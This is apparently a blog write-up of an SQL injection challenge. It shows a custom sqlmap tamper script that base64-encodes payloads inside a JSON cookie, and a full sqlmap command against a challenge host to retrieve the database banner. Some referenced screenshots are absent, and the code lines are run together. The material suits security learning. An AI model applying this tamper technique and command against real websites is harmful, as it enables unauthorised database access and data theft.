Playing with SQLMap Tamper Script
Recently, well not so recent, I came across SQL injection challenge that required me to look into tamper script feature in SQLMap. The reason is only part of the parameters was vulnerable and the existing tamper scripts act on the whole parameters, breaking the entire payload.
For example, I have one cookie that seemed to be vulnerable to SQLi, but only a portion of it needed to be attacked. That portion “NA==” was a base64 encoded value for “4”. This was used to display last book browsed by the user:
userchl2_info={“last_book”:”NA==”,”userchl2":””}
Adding escape character then base64-encoding it yielded error:
Since the position of the vulnerable parameter (inside a cookie), it was not straightforward to exploit with SQLMap. SQLMap was unable to find vulnerable parameter “last_book”:
In addition to that, remember “last_book” had to be base64 encoded, and the cookie structure had to be preserved as well, otherwise it would not work. My first attempt was to use tamper script called “base64encode” within /usr/share/sqlmap/tamper, by adding “— tamper=base64encode” to SQLMap command. However, this had unwanted ‘side effect’:
To solve the problem, I created tamper script that preserved the JSON structure of the cookie. Let’s call this mytamper.py and place it inside the same folder as the rest of tamper scripts:
#!/usr/bin/env python
from lib.core.convert import encodeBase64def dependencies():
passdef tamper(payload, **kwargs):
payload = encodeBase64(“4%s” % payload, binary=False)
return “{\”last_book\”:\”%s\”,\”userchl2\”:\”\”}” % payload
Then instructed SQLMap to use this tamper script.
Now, let’s grab the banner!
sqlmap -u “http://2.challenge.sqli.site/view_book.php?id=3" — cookie=”userchl2_info=” -p userchl2_info — level=2 — dbms=mysql — tamper=mytamper — banner
Tamper scripts can be used in situation where payloads need to follow certain format, and they are great 😊